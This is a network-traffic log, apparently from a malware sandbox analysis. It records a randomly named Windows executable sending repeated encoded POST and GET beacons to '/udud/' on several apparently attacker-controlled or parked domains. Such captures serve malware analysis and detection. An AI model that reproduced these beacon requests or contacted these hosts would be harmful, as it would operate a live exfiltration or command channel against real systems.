                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=2 [TRUNCATED]
                                                                                                May 27, 2024 12:35:03.870037079 CEST | 1289 | IN
                                                                                                Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
                                                                                                May 27, 2024 12:35:03.870170116 CEST | 1289 | IN
                                                                                                Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
                                                                                                May 27, 2024 12:35:03.870227098 CEST | 1289 | IN
                                                                                                Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
                                                                                                May 27, 2024 12:35:03.870594025 CEST | 710 | IN
                                                                                                Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                54 | 192.168.11.30 | 49884 | 64.190.62.22 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:09.071712017 CEST | 766 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=eKQ+1RcYKx2VfdZ5TIHBgIo9GvU1JUGpBHgkH/OVFChI4/KZMU7yzcYUTQc8+G5PWyH0gwo6bMzFLMszEbmsQ0W4kNnjNlXW/mFO+Z2fQku/5PVr20BAui4vA7rwmsa8mODIVQR3nAm4mccsJq+MGF9uks0XoZdBu/NgAb9ij01hPZH+O2BwqfKsauU77GK+iQ==
                                                                                                May 27, 2024 12:35:09.261962891 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:35:09 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                55 | 192.168.11.30 | 49885 | 64.190.62.22 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:11.789696932 CEST | 786 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=eKQ+1RcYKx2Vd9p5WrvBnopPafU1eEGtBHskH+bQCw1I7eaZNV7ymcYUbwc9zm5QWyD8gyM6bM3FLJozFoOrCUW+/dnhDFXW/mFO+aLwQne/5flr2Q1Hvi4gD7rwtMa4mOD6VUJZnEW4mZwsK7+LPF9srM0ZnJVI3tgURZRH630dHu2kT11y5/2BGv5T5ELl/aer0zjARMswyz8u57CxFgs=
                                                                                                May 27, 2024 12:35:11.980187893 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:35:11 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                56 | 192.168.11.30 | 49886 | 64.190.62.22 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:14.510251999 CEST | 1703 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.donantedeovulos.space
                                                                                                Referer: http://www.donantedeovulos.space/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:14.700639009 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:35:14 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                57 | 192.168.11.30 | 49887 | 64.190.62.22 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:17.225872040 CEST | 486 | OUT | GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:17.449994087 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:35:17 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==
                                                                                                last-modified: Mon, 27 May 2024 10:35:17 GMT
                                                                                                x-cache-miss-from: parking-54698f55d6-pm56b
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==><head><meta charset="utf-8"><title>donantedeovulos.space&nbsp;-&nbsp;donantedeovulos Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="donantedeovulos.space is your first and best source for all of the information youre looki
                                                                                                May 27, 2024 12:35:17.450010061 CEST | 1289 | IN |
                                                                                                Data Ascii: ng for. From general topics to more of what you would expect to find here, donantedeovulos.space has itAEC all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                58 | 192.168.11.30 | 49888 | 3.73.27.108 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:22.847505093 CEST | 763 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=sEt6YslxHAvnyPC8lPs5Rv2FAXdP8jLB0RF/HnD6/kwvVmgowUONAW3OpM5itG6TntU5R6hpwgipmBJSzLQv4E2krdRm7QAN0HjDNcisgc25HjwWrS/eSMlUumhxO7kw9i8NiW8LiVF3USVA2aHqnf4IcfBDc/4yq2V7rk7rYMUubZkM2Zh8AzwuA+B1ovusRw==
                                                                                                May 27, 2024 12:35:23.132189035 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:35:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=gbiispvjbljgmcrojhkjce820d; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.11.30 | 49889 | 3.73.27.108 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:35:25.568823099 CEST | 783 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:35:25.843925953 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:35:25 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=smvvp80sjvd506bou7008ikb7a; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.11.30 | 49890 | 3.73.27.108 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:35:28.285986900 CEST | 1700 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:35:28.566508055 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:35:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=d8iv0urgag0t0cnh4jbltmrciv; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                61 | 192.168.11.30 | 49891 | 3.73.27.108 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:31.002948999 CEST | 485 | OUT | GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:31.247622967 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:35:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=41lb3dcni2jqh97afn7lsn75l2; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Data Ascii: a148<!DOCTYPE html><html class="no-js" prefix="og: https://ogp.me/ns#" lang="it"><head><link rel="preconnect" href="https://d1di2lzuh97fh2.cloudfront.net" crossorigin><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><meta charset="utf-8"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957" type="image/svg+xml" sizes="any"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957" type="image/svg+xml" sizes="16x16"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="apple-touch-icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>40


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                62 | 192.168.11.30 | 49892 | 203.161.49.193 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:44.956448078 CEST | 742 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5saHZSaGz1v0aao0DSxxoukr680fJWWNSOduGJ+UZdcFq6A3Ri4lsRmP34Ju3n6lDjFjAgPBAevLfyHfEX9raQXYfuCTp7KdYe6UCAMeoJ9EFz0ANHUmClIvo/6r/yEKLzXaKxJgRJoLh6dv1THHoCXhpKACeRWqP+DHIylcUKZocFxsnT2k6PBQ==
                                                                                                May 27, 2024 12:35:45.126169920 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:35:45 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                63 | 192.168.11.30 | 49893 | 203.161.49.193 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:47.645598888 CEST | 762 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5sbkxSYhf1pUaViUDS7Rppkr280bxGW/2OdMOJvmxddFq6OXRnmVsamPrOJrPn6lHjFhIgPy4Zs7fwL/ER3LaQXYfuCSZdKeoe6kyAM7EK+EFyzANHF2ChIvpq6pK6EO7zXaaxJxRIhLh8SP0zHXsMYyVdPAOWMKH6Lw5o4fgIKIgottK70m7UcbHrOpfAlHjeEy4DO93DLoY=
                                                                                                May 27, 2024 12:35:47.820323944 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:35:47 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                64 | 192.168.11.30 | 49894 | 203.161.49.193 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:50.331497908 CEST | 1679 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5sbkxSYhf1pUaViUDS7Rppkr280bxGW/+Od5CJ93xdPVq6QHRmmVs9mPiHJrzR6nPjFCQgEj4Z7rfwDfEU9raFXYPqCTldKeoe6nqAKuoK4EFz0ANTUmCJIvgR6pPYH9zzU7qxKHlIgrh+VP0RHWROYyJ7PBq8MK/6IE0onsE8Zq0nmv2QjELkepD5BpDjyU2zaWxYW4eEVt6N7TOKJPaLr8/YBjVhiLlBIDsE67oznOwT2NvOHHxSTUFe9rUgVKwruiWCoGV6UqTV1ovCK09KllLKXrbubRwofebsyGYlSDiQKjoNe0uFyGSWnmQkiySDijCFwfzIpya5hdz52Bl5yHDngIzGFlVPG6x2UoCHL8gRF79RBEQcyEzS1li3EFj/Jo4m18U06opwRBRaQvPD1jUV7E43U25ivyANWKYlTFdjeY3nEnUA/D3cXlDIKOqciYsuzGw7nVpX6sML+pu8eyqqOnqWGdBGVq2gSO6o1T2TcAc3T7If/zODpPTi9qf7sg+qahdiYwbbu17z1sd6fVF2UmrKnopujO0ACQb/fKo0Ops7KO+cR4CVdBvrvjimndtfgiFZT25CPMMEDvRg6Ufn48jIm36cyHWwfFohqgHDKcakBjUwjjCNZG1DK/S/3xCVQdk+slrgI6B6vPDRFN1Ar76bH4XsLT6Jqr5OchtE+G6JN9Up9lVwoLPiFaR3Qzy9shpRjeZv4Uw6DJfSrolrMAQ7Wi/xBAcyhdb2BasOVQoMP145EwBxJNZWYAwuAWr5hVSJWGsdC/XIw7LmlMXAtMotaKRAqmcevnHdHovChzApfgWb0JxiDZifOAphGeXFmXnnTJ61Y4LsiNr6pBfc7syt2Tc+NRCg4N53T4MEGFDn0USCfhcelDyVYBYYrMErTi/aSmFlx+DUZ2Whcnczot2PAgsnf9mo9eBja2jWafQ0b6s3KYYfhh89h1Mndkstw62hlYkOCLB0qbgvaCqjh++4W0C [TRUNCATED]
                                                                                                May 27, 2024 12:35:50.501384020 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:35:50 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                65 | 192.168.11.30 | 49895 | 203.161.49.193 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                May 27, 2024 12:35:53.016457081 CEST | 478 | OUT | GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:53.197582960 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:35:53 GMT
